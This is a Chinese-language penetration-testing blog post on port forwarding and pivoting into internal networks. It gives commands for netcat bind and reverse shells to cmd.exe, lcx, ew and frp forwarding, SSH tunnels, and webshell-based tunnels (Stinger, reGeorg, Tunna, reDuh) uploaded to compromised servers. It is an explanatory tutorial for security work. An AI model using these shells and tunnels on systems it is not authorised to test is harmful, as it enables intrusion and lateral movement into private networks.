<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>代理转发 - ol4three</title><meta description="概念代理转发就是将一个端口，端口可以为主机端口也可以是访问到的人以主机的端口，转发到任意一台可以访问到的IP上 区分正向连接和反向连接 正向连接：你的机器连接目标机器 反向连接：目标机器反连你的机器（当防火墙设置端口过滤的话使用） 不论映射，还是转发，都有正有反，原理相同"><meta property="og:type" content="blog"><meta property="og:title" content="代理转发"><meta property="og:url" content="http://www.ol4three.com/2020/09/14/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91/"><meta property="og:site_name" content="ol4three"><meta property="og:description" content="概念代理转发就是将一个端口，端口可以为主机端口也可以是访问到的人以主机的端口，转发到任意一台可以访问到的IP上 区分正向连接和反向连接 正向连接：你的机器连接目标机器 反向连接：目标机器反连你的机器（当防火墙设置端口过滤的话使用） 不论映射，还是转发，都有正有反，原理相同"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/getImage-20200913231620854.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19627.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19653.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19655.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19664.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233151005.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233205362.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233216450.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105450022-144254035.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105454678-661386867.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105508839-410586839.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105513706-1137528557.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105517733-108622092.png"><meta property="og:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105536542-1886506584.png"><meta property="article:published_time" content="2020-09-13T20:14:11.000Z"><meta property="article:modified_time" content="2021-03-03T06:34:36.000Z"><meta property="article:author" content="ol4three"><meta property="article:tag" content="代理转发"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://oss-map.oss-cn-beijing.aliyuncs.com/img/getImage-20200913231620854.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://www.ol4three.com/2020/09/14/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91/"},"headline":"ol4three","image":["https://oss-map.oss-cn-beijing.aliyuncs.com/img/getImage-20200913231620854.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/19627.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/19653.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/19655.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/19664.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233151005.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233205362.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233216450.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105450022-144254035.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105454678-661386867.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105508839-410586839.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105513706-1137528557.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105517733-108622092.png","https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105536542-1886506584.png"],"datePublished":"2020-09-13T20:14:11.000Z","dateModified":"2021-03-03T06:34:36.000Z","author":{"@type":"Person","name":"ol4three"},"description":"概念代理转发就是将一个端口，端口可以为主机端口也可以是访问到的人以主机的端口，转发到任意一台可以访问到的IP上 区分正向连接和反向连接 正向连接：你的机器连接目标机器 反向连接：目标机器反连你的机器（当防火墙设置端口过滤的话使用） 不论映射，还是转发，都有正有反，原理相同"}</script><link rel="canonical" href="http://www.ol4three.com/2020/09/14/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91/"><link rel="icon" href="/img/logo.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><script data-ad-client="1" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" async></script><meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="ol4three" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="ol4three" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/about">About</a><a class="navbar-item" href="/Security%20Incidents">Security Incidents</a><a class="navbar-item" href="/Vulnerabilities">Vulnerabilities</a><a class="navbar-item" href="/Read%20Team">Read Team</a><a class="navbar-item" href="/Stop%20learning">Stop learning</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2020-09-13T20:14:11.000Z" title="2020-09-13T20:14:11.000Z">2020-09-14</time></span><span class="level-item">Updated&nbsp;<time dateTime="2021-03-03T06:34:36.000Z" title="2021-03-03T06:34:36.000Z">2021-03-03</time></span><span class="level-item">Updated&nbsp;<time dateTime="2021-03-03T06:34:36.000Z" title="2021-03-03T06:34:36.000Z">2021-03-03</time></span><span class="level-item"><a class="link-muted" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></span><span class="level-item">21 minutes read (About 3184 words)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>&nbsp;visits</span></div></div><h1 class="title is-3 is-size-4-mobile">代理转发</h1><div class="content"><h2 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h2><p>代理转发就是将一个端口，端口可以为主机端口也可以是访问到的人以主机的端口，转发到任意一台可以访问到的IP上</p>
<h2 id="区分正向连接和反向连接"><a href="#区分正向连接和反向连接" class="headerlink" title="区分正向连接和反向连接"></a>区分正向连接和反向连接</h2><ul>
<li>正向连接：你的机器连接目标机器</li>
<li>反向连接：目标机器反连你的机器（当防火墙设置端口过滤的话使用）</li>
<li>不论映射，还是转发，都有正有反，原理相同</li>
</ul>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/getImage-20200913231620854.png" alt="img"></p>
<a id="more"></a>

<h2 id="工具使用"><a href="#工具使用" class="headerlink" title="工具使用"></a>工具使用</h2><h3 id="NC"><a href="#NC" class="headerlink" title="NC"></a>NC</h3><p>nc的正向连接：</p>
<p>  在公网服务器上监听他的cmd.exe 命令为：nc.exe -l -p 4444 -e cmd.exe</p>
<p>  在攻击者上监听nc -vv 公网服务器ip 4444</p>
<p>  可以获取到公网服务器的cmd</p>
<p>nc的反向代理：</p>
<p>  在公网服务器上监听自己的4444端口：nc.exe -lvp 4444</p>
<p>  在内网主机中进行：nc -t -e cmd.exe 公网ip 4444</p>
<p>  公网可成功获取内网cmd</p>
<h3 id="LCX"><a href="#LCX" class="headerlink" title="LCX"></a>LCX</h3><p>LCX的内网端口转发（防火墙做过滤不允许别人连接自己的3389）</p>
<p>  内网执行lcx.exe -slave 公网ip 4444 127.0.0.1 3389  内网将自己的3389端口转发到公网的4444端口</p>
<p>  公网主机监听自己端口 lcx.exe -listen 4444 5555</p>
<p>则攻击者连接公网ip的5555端口即可连接上内网的3389</p>
<p>LCX的本地端口转发（防火墙做过滤不允许自己的3389连接出去）</p>
<p>  防火墙限制，部分端口无法通过防火墙，可以将目标主机的3389端口传到允许的其他端口比如53，则在目标主机执行：lcx -tran 53 目标主机ip 3389</p>
<p>  可以直接连接目标主机的ip:53</p>
<h3 id="ew做代理"><a href="#ew做代理" class="headerlink" title="ew做代理"></a>ew做代理</h3><p>①<strong>首先在VPS上做相应的代理监听：</strong></p>
<p><strong>./ew_for_Linux32 -s rcsocks -l 1008 -e 888</strong></p>
<p><strong>在VPS上 监听888端口 并加端口转发给 本地的 1008端口</strong></p>
<p>​    <img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19627.png" alt="0"></p>
<p>② <strong>在客户端(内网环境)连接VPS的888端口</strong></p>
<p><strong>ew_for_Win.exe -s rssocks -d 104.224.150.102 -e 888</strong></p>
<p>​    <img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19653.png" alt="0"></p>
<p>🌂<strong>利用相应的代理软件 来监听 VPS的1008端口既可以进行内网穿透式连接</strong></p>
<p>​    <img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19655.png" alt="0"></p>
<h3 id="利用frp做代理"><a href="#利用frp做代理" class="headerlink" title="利用frp做代理"></a>利用frp做代理</h3><p>download：<a target="_blank" rel="noopener" href="https://github.com/fatedier/frp/releases">https://github.com/fatedier/frp/releases</a></p>
<p>①<strong>首先在VPS上做如下配置：</strong></p>
<p><strong>修改 frps.ini</strong></p>
<p><strong>bind_port = 8080</strong></p>
<p><strong>privilege_token = pentest999</strong></p>
<p><strong>运行 nohup ./frps -c frps.ini &amp;</strong></p>
<p>​    <img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/19664.png" alt="0"></p>
<p>②<strong>在客户端上做如下配置：</strong></p>
<p><strong>修改 frpc.ini</strong></p>
<p><strong>[common]</strong></p>
<p><strong>server_addr = vps ip</strong></p>
<p><strong>server_port = 8080</strong></p>
<p><strong>privilege_token = pentest999</strong></p>
<p><strong>[plugin_socks5]</strong></p>
<p><strong>type = tcp</strong></p>
<p><strong>remote_port = 8081</strong></p>
<p><strong>plugin = socks5</strong></p>
<p><strong>plugin_user = ptest33333</strong></p>
<p><strong>plugin_passwd = ptest66666</strong></p>
<p><strong>运行 frpc -c fprc.ini</strong></p>
<p><strong>🌂利用相应的socks5代理连接 VPS的 8081端口即可</strong></p>
<h3 id="ssh-隧道代理转发"><a href="#ssh-隧道代理转发" class="headerlink" title="ssh 隧道代理转发"></a>ssh 隧道代理转发</h3><p>ssh 有三个强大的端口转发命令，分别是本地转发、远程转发、动态转发。</p>
<p>本地访问127.0.0.1:port1就是host:port2(用的更多)<br><code>ssh -CfNg -L port1:127.0.0.1:port2 user@host</code> #本地转发<br>访问host:port2就是访问127.0.0.1:port1<br><code>ssh -CfNg -R port2:127.0.0.1:port1 user@host</code> #远程转发<br>可以将dmz_host的hostport端口通过remote_ip转发到本地的port端口<br><code>ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip</code> #正向隧道 监听本地port 可以将dmz_host的hostport端口转发到remote_ip的port端口<br><code>ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip</code> #反向隧道<br>用于内网穿透防火墙限制之类<br>socket 代理: <code>ssh -qTfnN -D port remotehost</code></p>
<h3 id="毒刺Stinger进行端口转发"><a href="#毒刺Stinger进行端口转发" class="headerlink" title="毒刺Stinger进行端口转发"></a>毒刺Stinger进行端口转发</h3><p><strong>端口转发</strong></p>
<ol>
<li>将stinger_server和proxy.php上传到目标服务器,确保 <a target="_blank" rel="noopener" href="http://192.168.1.106:81/proxy.php可以访问,页面返回">http://192.168.1.106:81/proxy.php可以访问,页面返回</a> stinger XXX!</li>
<li>目标服务器执行如下命令启动代理服务(使用菜刀执行命令时可以添加start /b 或&amp; 后台运行,确保服务端7000端口未被占用)</li>
</ol>
<p>PS C:\Users\test\Desktop&gt; .\stinger_server_win_x64.exe -listen 127.0.0.1:7000 -username test -password testpass</p>
<ol>
<li>本地PC执行如下命令连接代理脚本</li>
</ol>
<p>stinger_client_win_x64.exe -local 127.0.0.1:1080 -proxy_server <a target="_blank" rel="noopener" href="http://192.168.1.106:81/proxy.php">http://192.168.1.106:81/proxy.php</a> -remote_server <a target="_blank" rel="noopener" href="http://127.0.0.1:7000">http://127.0.0.1:7000</a> -remote 127.0.0.1:3389 -username test -password testpass</p>
<ol>
<li>此时已经将192.168.1.106的3389端口映射到了你本地pc的1080端口</li>
</ol>
<p><strong>SOCK5代理</strong></p>
<ol>
<li>将stinger_server和proxy.php上传到目标服务器,确保 <a target="_blank" rel="noopener" href="http://192.168.1.106:81/proxy.php可以访问,页面返回">http://192.168.1.106:81/proxy.php可以访问,页面返回</a> stinger XXX!</li>
<li>目标服务器执行如下命令启动代理服务(使用菜刀执行命令时可以添加start /b 或&amp; 后台运行,确保服务端7000,8000端口未被占用)</li>
</ol>
<p>PS C:\Users\test\Desktop&gt; .\stinger_server_win_x64.exe -listen 127.0.0.1:7000 -username test -password testpass -socks5Addr 127.0.0.1:8000</p>
<ol>
<li>本地PC执行如下命令连接代理脚本</li>
</ol>
<p>stinger_client_win_x64.exe -local 127.0.0.1:1080 -proxy_server <a target="_blank" rel="noopener" href="http://192.168.1.106:81/proxy.php">http://192.168.1.106:81/proxy.php</a> -remote_server <a target="_blank" rel="noopener" href="http://127.0.0.1:7000">http://127.0.0.1:7000</a> -remote 127.0.0.1:8000 -username test -password testpass</p>
<ol>
<li>此时你本地PC已经在1080生成一个SOCKS5代理,可以使用该代理访问目标内网</li>
</ol>
<p><strong>已测试</strong></p>
<p><strong>stinger_server\stinger_client</strong></p>
<ul>
<li>windows</li>
<li>linux</li>
</ul>
<p><strong>proxy.jsp/php/aspx</strong></p>
<ul>
<li>php7.2</li>
<li>tomcat7.0</li>
<li>iis8.0</li>
</ul>
<p><strong>已知问题</strong></p>
<ul>
<li>client端的socket连接无法自动释放</li>
</ul>
<p><strong>结语</strong></p>
<ul>
<li>php是最好的语言</li>
<li>啊D是最好的渗透测试工具</li>
</ul>
<h3 id="reGeorg端口转发"><a href="#reGeorg端口转发" class="headerlink" title="reGeorg端口转发"></a>reGeorg端口转发</h3><p>reGeorg不用多介绍了，内网渗透中常用工具之一。小白经常用于渗透测试中的内网转发，主要是因为方便实用。这个工具需要配合</p>
<p>proxifier,使用的socks5代理进行运用的。标红的是我们需要的脚本，根据自己的需要结合实际测试环境来选用的。 </p>
<p>首先我们现经代理脚本上传到服务器，实验的环境是jsp的，所以上传代理脚本tunnel.nosocket.jsp，然后我们在浏览器访问一下，如果出现以下提示就说明代理成功。</p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233151005.png" alt="image-20200913233151005"></p>
<p>上传代理脚本成功后，我们打开proxifier进行配置参数，代理的端口默认是8888，代理的规则我们设置为谷歌浏览器，如果其它的不需要可以去掉勾：</p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233205362.png" alt="image-20200913233205362"></p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/image-20200913233216450.png" alt="image-20200913233216450"></p>
<p>上述代理参数配置完毕后，我们在cmd输入一下命令就会出现下面的界面:python2.exe reGeorgSocksProxy.py -p 8888 -u<a target="_blank" rel="noopener" href="http://xxxx:8888/tran.jsp。这样的话我们就把内网的流量代理到外面，我们下一步就可以使用扫描工具进行内网的横向扫描。就这么简单直接。如果内网中的3389只能是内网进行连接的话，我们可以使用mstsc.exe通过代理进行连接3389远程桌面，其它的端口都是一样的道理，灵活运用即可。">http://xxxx:8888/tran.jsp。这样的话我们就把内网的流量代理到外面，我们下一步就可以使用扫描工具进行内网的横向扫描。就这么简单直接。如果内网中的3389只能是内网进行连接的话，我们可以使用mstsc.exe通过代理进行连接3389远程桌面，其它的端口都是一样的道理，灵活运用即可。</a></p>
<h3 id="Tunna端口转发"><a href="#Tunna端口转发" class="headerlink" title="Tunna端口转发"></a>Tunna端口转发</h3><p>Tunna这个工具使用起来也特方便，脚本的编写也是基于Python2版本。运用的时候也需要我们把代理脚本上传到目标服务器，然后通过代理内网的某个端口，注意这个工具只能代理一个端口，有点局限性。但是我们可以代理3389、22、3306、1433等敏感端口，然后将敏感端口流量转发了外网的的某个端口，我们再通过本地连接外网的端口进行连接，这样的话我们就可以使用了。</p>
<p>第一步：我们将代理脚本上传到目标服务器，在浏览器访问代理脚本是否被解析</p>
<p>第二步：运行proxy.py 并指定端口 python proxy.py -u<a target="_blank" rel="noopener" href="http://219.x.x.x/conn.jsp">http://192.168.205.143/conn.php </a>-l 1234 -r 3389 -v</p>
<p>第三步：本地执行rdesktop 127.0.0.1:1234</p>
<h3 id="reDuh端口转发"><a href="#reDuh端口转发" class="headerlink" title="reDuh端口转发"></a>reDuh端口转发</h3><p>reDuh也是一款内网渗透利器，这个工具可以把内网服务器的端口通过http/https隧道转发到本机，形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。服务端是个webshell，工具里面针对不同服务器有aspx,php,jsp三个版本，客户端是java写的，本机执行最好装上JDK软件。</p>
<p>我们将代理脚本上传到目标服务器，在本地访问代理脚本</p>
<p>这样我们执行一下三条命令就可以成功将目标主机的3389端口代理到本地的1234端口，本地连接1234端口就可以登陆内网服务器。</p>
<p>java -jar reDuhClient.ja r<a target="_blank" rel="noopener" href="http://somesite.com/reDuh.php">http://somesite.com/reDuh.php</a></p>
<p>本地连接1010端口</p>
<p>nc -vv localhost 1010</p>
<p>连接成功会有欢迎提示，之后输入命,在java命令窗口执行</p>
<p>[createTunnel]1234:127.0.0.1:3389</p>
<h3 id="基于powershell的socks代理"><a href="#基于powershell的socks代理" class="headerlink" title="基于powershell的socks代理"></a>基于powershell的socks代理</h3><p>介绍github：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;p3nt4&#x2F;Invoke-SocksProxy&#x2F;master&#x2F;Invoke-SocksProxy.psm1</span><br></pre></td></tr></table></figure>

<p>在1234端口创建一个Socks 4/5 代理:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Import-Module .\Invoke-SocksProxy.psm1</span><br><span class="line"></span><br><span class="line">Invoke-SocksProxy -bindPort 1234</span><br></pre></td></tr></table></figure>



<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105450022-144254035.png" alt="img"></p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105454678-661386867.png" alt="img"></p>
<p>效果:</p>
<p>这里用同网段的另一个win7，使用Proxifer去使用靶机的1234端口进行socks代理</p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105508839-410586839.png" alt="img"></p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105513706-1137528557.png" alt="img"></p>
<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105517733-108622092.png" alt="img"></p>
<p>增加线程(默认是200,增加到400,默认端口1080)：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Import-Module .\Invoke-SocksProxy.psm1</span><br><span class="line"></span><br><span class="line">Invoke-SocksProxy -threads 400</span><br></pre></td></tr></table></figure>

<p><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/1545399-20190419105536542-1886506584.png" alt="img"></p>
<h3 id="nps"><a href="#nps" class="headerlink" title="nps"></a>nps</h3><blockquote>
<p>nps是一款轻量级、高性能、功能强大的<strong>内网穿透</strong>代理服务器。目前支持<strong>tcp、udp流量转发</strong>，可支持任何<strong>tcp、udp</strong>上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还<strong>支持内网http代理、内网socks5代理</strong>、<strong>p2p等</strong>，并带有功能强大的web管理端。</p>
</blockquote>
<h4 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h4><ol>
<li>做微信公众号开发、小程序开发等—-&gt; 域名代理模式</li>
<li>想在外网通过ssh连接内网的机器，做云服务器到内网服务器端口的映射，—-&gt; tcp代理模式</li>
<li>在非内网环境下使用内网dns，或者需要通过udp访问内网机器等—-&gt; udp代理模式</li>
<li>在外网使用HTTP代理访问内网站点—-&gt; http代理模式</li>
<li>搭建一个内网穿透ss，在外网如同使用内网vpn一样访问内网资源或者设备—-&gt; socks5代理模式</li>
</ol>
<h4 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h4><ul>
<li>协议支持全面，兼容几乎所有常用协议，例如tcp、udp、http(s)、socks5、p2p、http代理…</li>
<li>全平台兼容(linux、windows、macos、群辉等)，支持一键安装为系统服务</li>
<li>控制全面，同时支持服务端和客户端控制</li>
<li>https集成，支持将后端代理和web服务转成https，同时支持多证书</li>
<li>操作简单，只需简单的配置即可在web ui上完成其余操作</li>
<li>展示信息全面，流量、系统信息、即时带宽、客户端版本等</li>
<li>扩展功能强大，该有的都有了（缓存、压缩、加密、流量限制、带宽限制、端口复用等等）</li>
<li>域名解析具备自定义header、404页面配置、host修改、站点保护、URL路由、泛解析等功能</li>
<li>服务端支持多用户和用户注册功能</li>
</ul>
<h4 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h4><p><a target="_blank" rel="noopener" href="https://github.com/ehang-io/nps/releases">releases</a></p>
<h4 id="服务端启动"><a href="#服务端启动" class="headerlink" title="服务端启动"></a>服务端启动</h4><p>下载完服务器压缩包后，解压，然后进入解压后的文件夹</p>
<ul>
<li>执行安装命令</li>
</ul>
<p>对于linux|darwin <code>sudo ./nps install</code></p>
<p>对于windows，管理员身份运行cmd，进入安装目录 <code>nps.exe install</code></p>
<ul>
<li>默认端口</li>
</ul>
<p>nps默认配置文件使用了80，443，8080，8024端口</p>
<p>80与443端口为域名解析模式默认端口</p>
<p>8080为web管理访问端口</p>
<p>8024为网桥端口，用于客户端与服务器通信</p>
<ul>
<li>启动</li>
</ul>
<p>对于linux|darwin <code>sudo nps start</code></p>
<p>对于windows，管理员身份运行cmd，进入程序目录 <code>nps.exe start</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">安装后windows配置文件位于 C:\Program Files\nps，linux和darwin位于&#x2F;etc&#x2F;nps</span><br></pre></td></tr></table></figure>

<p><strong>如果发现没有启动成功，可以查看日志(Windows日志文件位于当前运行目录下，linux和darwin位于/var/log/nps.log)</strong></p>
<ul>
<li>访问服务端ip:web服务端口（默认为8080）</li>
<li>使用用户名和密码登陆（默认admin/123，正式使用一定要更改）</li>
<li>创建客户端</li>
</ul>
<h4 id="客户端连接"><a href="#客户端连接" class="headerlink" title="客户端连接"></a>客户端连接</h4><ul>
<li>点击web管理中客户端前的+号，复制启动命令</li>
<li>执行启动命令，linux直接执行即可，windows将./npc换成npc.exe用cmd执行</li>
</ul>
<h4 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h4><ul>
<li>客户端连接后，在web中配置对应穿透服务即可</li>
</ul>
<h4 id="更多用法以及详细教程"><a href="#更多用法以及详细教程" class="headerlink" title="更多用法以及详细教程"></a>更多用法以及详细教程</h4><p><a target="_blank" rel="noopener" href="https://ehang-io.github.io/nps/#/">https://ehang-io.github.io/nps/#/</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>代理转发</p><p><a href="http://www.ol4three.com/2020/09/14/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91/">http://www.ol4three.com/2020/09/14/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>ol4three</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2020-09-14</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2021-03-03</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><hr style="height:1px;margin:1rem 0"><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/%E4%BB%A3%E7%90%86%E8%BD%AC%E5%8F%91/">代理转发 </a></div></div><div class="sharethis-inline-share-buttons"></div><script src=" " defer></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"><a class="button is-info donate"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>Alipay</span><span class="qrcode"><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/20230128152554.png" alt="Alipay"></span></a><a class="button is-success donate"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>Wechat</span><span class="qrcode"><img src="https://oss-map.oss-cn-beijing.aliyuncs.com/img/20230128152647.png" alt="Wechat"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/09/14/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/pwnable.kr/Exploit/CVE-2020-16875-Exchange-Server-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CVE-2020-16875: Exchange Server 远程代码执行漏洞</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/09/13/WEB/%E6%A3%80%E6%B5%8BPHP%E7%BD%91%E7%AB%99%E6%98%AF%E5%90%A6%E8%A2%AB%E6%94%BB%E7%A0%B4%E7%9A%84%E6%96%B9%E6%B3%95/"><span class="level-item">检测PHP网站是否被攻破的方法</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">Comments</h3><div class="content" id="valine-thread"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script><script>new Valine({
            el: '#valine-thread' ,
            appId: "Mi7VTJ1Ohx0XKeYNBRfjWrY5-gzGzoHsz",
            appKey: "kqSPJKxTTPM9aNVRrWttS4HT",
            
            avatar: "mm",
            
            meta: ["nick","mail","link"],
            pageSize: 10,
            lang: "en",
            
            highlight: true,
            
            
            
            
            
            requiredFields: [],
        });</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="/img/avatar.png" alt="ol4three"></figure><p class="title is-size-4 is-block line-height-inherit">ol4three</p><p class="is-size-6 is-block">醒来时世界都远了，我需要最狂的风，和最静的海。</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>BeiJing,China</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">118</p></a></div></div><a class="level-item has-text-centered is-marginless" href="/categories"><div><p class="heading">Categories</p><div><p class="title">10</p></div></div></a><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">114</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/ol4three" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" 